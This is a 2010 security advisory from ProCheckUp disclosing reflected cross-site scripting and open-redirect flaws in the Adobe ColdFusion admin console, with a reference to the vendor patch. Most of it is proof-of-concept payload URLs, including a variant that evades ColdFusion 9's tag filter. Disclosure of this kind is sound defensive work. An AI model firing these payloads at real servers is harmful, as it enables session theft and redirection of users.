Adobe ColdFusion Cross Site Scripting

`http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-08  
  
  
PR10-08: Various XSS and information disclosure flaws within Adobe  
ColdFusion administration console  
Vulnerability found: 17th April 2010  
  
Vendor informed: 19th April 2010  
  
Vulnerability fixed: 8th February 2011  
  
Severity: Medium/High  
  
Description:  
Adobe ColdFusion is an easy to use and very widely adopted Programming  
language, Procheckup has discovered that the ColdFusion admin console  
(and various programs within), are vulnerable to reflective XSS attacks.  
The Admin console is normally accessed using a web browser over port  
8500 (though this can be changed) or directly mapped onto a web server  
directory by proxying cfm extensions.  
Note: Tested on ColdFusion enterprise version 8.01 running on Windows  
XP, and ColdFusion 7,8,9 running on Windows 2003 R2 SP2 server and  
mapped to IIS 6.  
Defaults were chosen with "server contained installation", and all  
subcomponents.  
Versions tested  
ColdFusion MX7 7,0,0,91690 base patches  
ColdFusion MX8 8,0,1,195765 base patches  
ColdFusion MX8 8,0,1,195765 with Hotfix4  
ColdFusion MX8 8,0,1,195765 with Hotfix4 and patches from security  
Bulletin APSB10-11 shf8010001.jar and CFIDE-801.zip  
ColdFusion 9 9,0,0,251028 base patches - ColdFusion 9 includes a simple  
list of forbidden tags. So <script> cannot be used.  
ColdFusion 9 9,0,0,251028 with Hotfix1 – ColdFusion 9 includes a simple  
list of forbidden tags. So <script> cannot be used  
The following demonstrate the XSS flaws:-  
  
1) Unauthenticated vanilla XSS - ColdFusion 7 and ColdFusion 8. IE7  
browser used.  
http://target-domain.foo:8500/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
Does not work with ColdFusion 7  
http://target-domain.foo:8500/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&"><script>alert(1)</script>=1  
  
http://target-domain.foo:8500/CFIDE/administrator/extensions/corbaedit.cfm?"><script>alert(1)</script>  
  
http://target-domain.foo:8500/CFIDE/administrator/logviewer/searchlog.cfm?logfile="><script>alert(1)</script>  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/[email protected]&browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2"><script>alert(1)</script>1fb5988b6d1  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
http://target-domain.foo:8500/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a"><script>alert(1)</script>3081b18fb95=1  
  
Works intermittently, or delayed response.  
http://target-domain.foo:8500/CFIDE/administrator/analyzer/index.cfm?browsesubmit=Browse+Server&directory=C%3a%5cColdFusion8%5cwwwroot%5cCFIDE%5cadministrator%5canalyzerd590f"style%3d"x:expression(alert(1))"  
  
COLDFUSION VERSION 9 – Variants which work with CF9 as do not use the  
<script> tag  
To circumvent this the <script>alert(1)</script> needs to be substituted  
with a tag not on the match list  
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
(this works on IE7 & IE6)  
  
http://target-domain.foo/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1  
  
http://target-domain.foo/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>=1  
  
http://target-domain.foo/CFIDE/administrator/extensions/corbaedit.cfm?"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
  
http://target-domain.foo/CFIDE/administrator/logviewer/searchlog.cfm?logfile="></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
  
http://target-domain.foo/CFIDE/administrator/settings/[email protected]&browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
  
http://target-domain.foo/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
  
http://target-domain.foo/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>1  
  
http://target-domain.foo/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1  
  
http://target-domain.foo/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>3081b18fb95=1  
  
3) Authenticated vanilla XSS attacks.  
IE7 +Firefox - authenticated  
http://target-domain.foo:8500/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1"><script>alert(1)</script>5d59011273e  
IE7 - authenticated  
http://target-domain.foo:8500/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true  
  
IE7 - authenticated – Does not work with ColdFusion 7  
http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit  
  
Takes a while to come back - authenticated  
http://target-domain.foo:8500/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f  
  
  
COLDFUSION VERSION 9 – Variants which work with CF9 as do not use the  
<script> tag  
To circumvent this the <script>alert(1)</script> needs to be substituted  
with a tag not on the match list  
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>  
(this works on IE7 & IE6)  
  
http://target-domain.foo/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1"></XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>5d59011273e  
  
http://target-domain.foo/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true  
  
http://target-domain.foo/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit  
  
Takes a while to come back  
http://target-domain.foo/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f  
  
4) Authenticated vanilla XSS fixed in ColdFusion 8 hotfix 4 (works with  
ColdFusion 8 and ColdFusion 7).  
  
http://target-domain.foo:8500/CFIDE/administrator/datasources/index.cfm?locale=enb6f5d"style%3d"x:expression(alert(1))"24ac5d7bc65&VerifyAllDatasources=+Verify+All+Connections+  
http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gateways.cfm?gwid=SMS%20Menu%20App%20%2D%20555121268668"style%3d"x:expression(alert(1))"886b9fc22e4&action=edit  
  
http://target-domain.foo:8500/CFIDE/administrator/j2eepackaging/editarchive.cfm?locale=en579a7"style%3d"x:expression(alert(1))"df5c8bdd5e9&addarchive=%a0+Add+%a0&archivename=Test+Me  
  
Takes a while to come back  
http://target-domain.foo:8500/CFIDE/administrator/settings/charting.cfm?browsesubmit=Browse+Server&CachePath=C%3a%5cJRun4%5cservers%5ccfusion%5ccfusion-ear%5ccfusion-war%5cWEB-INF%5ccfusion%5ccharting%5ccachef2250"style%3d"x:expression(alert(1))"7d1c33c9139&maxEngines=4&cacheSize=50&cacheType=1  
  
  
  
Consequences:  
  
An attacker may be able to cause execution of malicious scripting code  
in the browser of a user who clicks on a link to an exposed ColdFusion  
admin site. Such code would run within the security context of the  
target domain. This type of attack can result in non-persistent  
defacement of the target site, or the redirection of confidential  
information (i.e.: session IDs) to unauthorised third parties.  
  
  
  
Fix:  
Apply patch as described in Adobe bulletin apsb11-04  
http://www.adobe.com/support/security/bulletins/apsb11-04.html  
  
  
  
4) Open redirection - fixed hot fix 4  
http://target-domain.foo:8500/CFIDE/administrator/logging/archiveexecute.cfm?logfile=application%2Elog&return=true  
Set the referer header..  
Referer: http://www.procheckup.com  
  
References:  
http://www.procheckup.com/Vulnerabilities.php  
http://www.adobe.com/support/security/bulletins/apsb11-04.html  
http://www.securityfocus.com/bid/46273  
  
Fix:  
Apply patch as described in Adobe bulletin apsb11-04  
http://www.adobe.com/support/security/bulletins/apsb11-04.html  
  
  
Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)  
  
  
Legal:  
  
Copyright 2010 Procheckup Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the  
Internet community for the purpose of alerting them to problems, if and  
only if, the Bulletin is not edited or changed in any way, is attributed  
to Procheckup, and provided such reproduction and/or distribution is  
performed for non-commercial purposes.  
  
Any other use of this information is prohibited. Procheckup is not  
liable for any misuse of this information by any third party.  
  
`